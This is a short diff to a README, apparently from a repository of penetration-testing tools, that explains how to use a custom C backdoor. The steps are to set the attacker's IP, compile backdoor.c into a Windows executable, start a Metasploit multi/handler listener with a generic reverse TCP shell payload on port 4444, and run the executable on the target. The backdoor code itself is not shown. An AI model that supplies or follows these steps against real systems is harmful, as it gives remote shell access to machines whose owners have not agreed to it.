pentestfunctions/metasploit_c_custom/README.md

 ## Usage

 1. Replace `YOUR_IP_HERE` with your actual IP address
-2. Compile using `gcc -O2 backdoor.c -o github_gcc_test.exe` on a windows machine
+2. Compile using `gcc -O2 backdoor.c -o backdoor.exe` on a windows machine
 3. Set up a metasploit listener on your machine: `msfconsole -q -x "use exploit/multi/handler; set LHOST eth0; set LPORT 4444; set Payload generic/shell_reverse_tcp; run -j"`
 4. Run the executable on the target Windows machine